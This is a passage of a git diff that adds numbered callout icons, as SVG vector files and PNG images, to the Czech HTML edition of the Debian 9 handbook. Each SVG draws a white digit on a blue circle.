+       d="m 20.48741,9.7149811 c 0.503575,1.23e-5 0.979486,0.060885 1.427734,0.1826172 0.448236,0.1217567 0.841139,0.3043737 1.178711,0.5478517 0.337557,0.243501 0.605949,0.547862 0.805176,0.913086 0.19921,0.365244 0.298819,0.794118 0.298828,1.286621 -9e-6,0.365243 -0.05535,0.697274 -0.166016,0.996094 -0.110685,0.293302 -0.262866,0.561694 -0.456543,0.805175 -0.193692,0.237963 -0.423347,0.451017 -0.688965,0.639161 -0.265631,0.188157 -0.553392,0.359707 -0.863281,0.514648 0.320957,0.171556 0.63362,0.362473 0.937988,0.572754 0.309889,0.210292 0.583814,0.448247 0.821778,0.713867 0.237947,0.260096 0.428865,0.55339 0.572754,0.879883 0.143871,0.326501 0.215811,0.691735 0.21582,1.095703 -9e-6,0.503583 -0.09962,0.960126 -0.298828,1.369629 -0.199227,0.409506 -0.478687,0.758139 -0.838379,1.045898 -0.359708,0.287761 -0.791348,0.509115 -1.294922,0.664063 -0.498053,0.154948 -1.048671,0.232422 -1.651855,0.232422 -0.652999,0 -1.234053,-0.07471 -1.743164,-0.224121 -0.509117,-0.149414 -0.937991,-0.362467 -1.286622,-0.639161 -0.348634,-0.276691 -0.614258,-0.617023 -0.796875,-1.020996 -0.177084,-0.403969 -0.265625,-0.857744 -0.265625,-1.361328 0,-0.415035 0.06087,-0.78857 0.182618,-1.120605 0.121744,-0.332027 0.287759,-0.630855 0.498046,-0.896485 0.210285,-0.265619 0.456542,-0.500808 0.73877,-0.705566 0.282224,-0.204747 0.583819,-0.384597 0.904785,-0.539551 -0.271161,-0.171543 -0.525718,-0.356927 -0.763672,-0.556152 -0.237957,-0.204746 -0.445477,-0.428866 -0.622558,-0.672363 -0.171551,-0.249016 -0.309897,-0.522942 -0.415039,-0.821778 -0.09961,-0.298819 -0.149415,-0.628083 -0.149414,-0.987793 -1e-6,-0.481435 0.09961,-0.902008 0.298828,-1.261718 0.204751,-0.365224 0.478676,-0.669585 0.821777,-0.913086 0.343097,-0.249012 0.738767,-0.434396 1.187012,-0.5561527 0.448238,-0.1217326 0.918615,-0.1826049 1.411133,-0.1826172 m -1.718262,9.0644529 c -3e-6,0.221357 0.03597,0.42611 0.10791,0.614258 0.07194,0.18262 0.17708,0.340334 0.31543,0.473145 0.143876,0.132814 0.32096,0.237957 0.53125,0.315429 0.210282,0.07194 0.453771,0.107912 0.730468,0.10791 0.58105,2e-6 1.015457,-0.135577 1.303223,-0.406738 0.287754,-0.27669 0.431634,-0.639157 0.431641,-1.087402 -7e-6,-0.232419 -0.04981,-0.439938 -0.149414,-0.622559 -0.09408,-0.188147 -0.218594,-0.359696 -0.373535,-0.514648 -0.14942,-0.160478 -0.32097,-0.307125 -0.514649,-0.439942 -0.19369,-0.132807 -0.387375,-0.260086 -0.581055,-0.381836 L 20.3878,16.72084 c -0.243494,0.12175 -0.464848,0.254563 -0.664062,0.398438 -0.199223,0.138351 -0.370772,0.293299 -0.514649,0.464844 -0.138349,0.16602 -0.246259,0.348637 -0.32373,0.547851 -0.07748,0.199223 -0.116214,0.415043 -0.116211,0.647461 m 1.70166,-7.188476 c -0.182622,10e-6 -0.354171,0.02768 -0.514648,0.08301 -0.154952,0.05535 -0.290532,0.13559 -0.406739,0.240723 -0.11068,0.105153 -0.199222,0.235199 -0.265625,0.390137 -0.06641,0.154957 -0.09961,0.329274 -0.09961,0.522949 -3e-6,0.232431 0.0332,0.434416 0.09961,0.605957 0.07194,0.166024 0.166012,0.315438 0.282227,0.448242 0.121741,0.127287 0.260087,0.243498 0.415039,0.348633 0.160477,0.09962 0.32926,0.199226 0.506348,0.298828 0.171544,-0.08853 0.334793,-0.185376 0.489746,-0.290527 0.154942,-0.105135 0.290522,-0.224113 0.406738,-0.356934 0.121739,-0.138338 0.218581,-0.293286 0.290527,-0.464843 0.07193,-0.171541 0.107904,-0.367993 0.10791,-0.589356 -6e-6,-0.193675 -0.03321,-0.367992 -0.09961,-0.522949 -0.06641,-0.154938 -0.15772,-0.284984 -0.273926,-0.390137 -0.116216,-0.105133 -0.254562,-0.185374 -0.415039,-0.240723 -0.160487,-0.05533 -0.334803,-0.083 -0.522949,-0.08301"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.png
new file mode 100644
index 000000000..bda9a8c55
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.svg
new file mode 100644
index 000000000..385378074
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/19.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 13.215925,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141118,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168787,0.157724 -0.257325,0.240723 -0.08854,0.08302 -0.1743194,0.157723 -0.2573238,0.224121 L 8.442976,14.529434 7.1978588,12.985489 11.107527,9.8726959 l 2.108398,0 0,12.1357421"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.554792,15.052383 c -8e-6,0.581061 -0.03321,1.162116 -0.09961,1.743164 -0.06088,0.575526 -0.174325,1.126144 -0.340332,1.651856 -0.16049,0.525719 -0.381844,1.018232 -0.664063,1.477539 -0.2767,0.453778 -0.630866,0.846681 -1.0625,1.178711 -0.426112,0.332032 -0.94076,0.59489 -1.543945,0.788574 -0.597661,0.188151 -1.300459,0.282227 -2.108398,0.282227 -0.116214,0 -0.243493,-0.0028 -0.381836,-0.0083 -0.138349,-0.0055 -0.279462,-0.01384 -0.42334,-0.0249 -0.138348,-0.0055 -0.273928,-0.0166 -0.406738,-0.0332 -0.132814,-0.01107 -0.249025,-0.02767 -0.348633,-0.0498 l 0,-2.058594 c 0.204751,0.05534 0.423338,0.09961 0.655762,0.132813 0.237953,0.02767 0.478675,0.04151 0.722168,0.0415 0.747066,2e-6 1.361324,-0.09131 1.842773,-0.273925 0.48144,-0.188149 0.863276,-0.44824 1.145508,-0.780274 0.28222,-0.337562 0.481439,-0.738766 0.597656,-1.203613 0.121738,-0.464839 0.196445,-0.97672 0.224121,-1.535645 l -0.10791,0 c -0.110683,0.199225 -0.243496,0.384609 -0.398438,0.556153 -0.154953,0.171554 -0.33757,0.320968 -0.547851,0.448242 -0.210292,0.127283 -0.448247,0.226892 -0.713867,0.298828 -0.26563,0.07194 -0.561691,0.107914 -0.888184,0.10791 -0.525719,4e-6 -0.998863,-0.08577 -1.419433,-0.257324 -0.420575,-0.171545 -0.777509,-0.420568 -1.070801,-0.74707 -0.287762,-0.326492 -0.509116,-0.727696 -0.664063,-1.203614 -0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.png
new file mode 100644
index 000000000..b95445a4e
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.svg
new file mode 100644
index 000000000..236a8dacb
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/2.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.89546,22.008438 -8.143066,0 0,-1.784668 2.855468,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979493,-1.0708 0.293289,-0.326492 0.545079,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.373529,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.17431,-0.666821 0.174316,-1.037598 -6e-6,-0.409496 -0.124517,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827313,0.522958 -1.270019,0.921386 l -1.394531,-1.651855 c 0.249022,-0.226877 0.509113,-0.442698 0.780273,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079102,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319824,-0.1494141 0.58105,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187012,0.6889648 0.326489,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.png
new file mode 100644
index 000000000..c30191a36
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.svg
new file mode 100644
index 000000000..d41206eec
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/20.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.png
new file mode 100644
index 000000000..fa3aa907d
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.svg
new file mode 100644
index 000000000..b17f23a5a
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/21.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.png
new file mode 100644
index 000000000..b724ced13
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.svg
new file mode 100644
index 000000000..22deeb3ed
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/22.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.png b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.png
new file mode 100644
index 000000000..8b69b8292
Binary files /dev/null and b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.png differ
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.svg b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.svg
new file mode 100644
index 000000000..c0a33eeb0
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/Common_Content/images/23.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 15.257917,22.008438 -8.143066,0 0,-1.784668 2.8554687,-3.07959 c 0.3596963,-0.387364 0.6861933,-0.744297 0.9794923,-1.0708 0.293289,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373536,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437178,10e-6 -0.857751,0.10792 -1.2617183,0.323731 C 9.3422244,12.379541 8.918885,12.68667 8.4761791,13.085098 L 7.0816479,11.433243 C 7.3306704,11.206366 7.5907613,10.990545 7.8619213,10.785782 8.1330785,10.575507 8.4319063,10.390123 8.7584057,10.22963 9.0849004,10.06916 9.4446006,9.9418812 9.8375072,9.8477936 10.230407,9.7481965 10.670348,9.6983918 11.157331,9.6983795 c 0.58105,1.23e-5 1.101232,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860508,0.3901488 1.187012,0.6889648 0.32649,0.293305 0.575513,0.650239 0.74707,1.070801 0.177075,0.420583 0.265617,0.893727 0.265625,1.419433 -8e-6,0.47592 -0.08302,0.932463 -0.249023,1.369629 -0.166024,0.431648 -0.392912,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622566,0.830083 -1.004395,1.245117 -0.376308,0.40951 -0.780279,0.827315 -1.211914,1.253418 l -1.460937,1.469238 0,0.116211 4.947265,0 0,2.158203"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
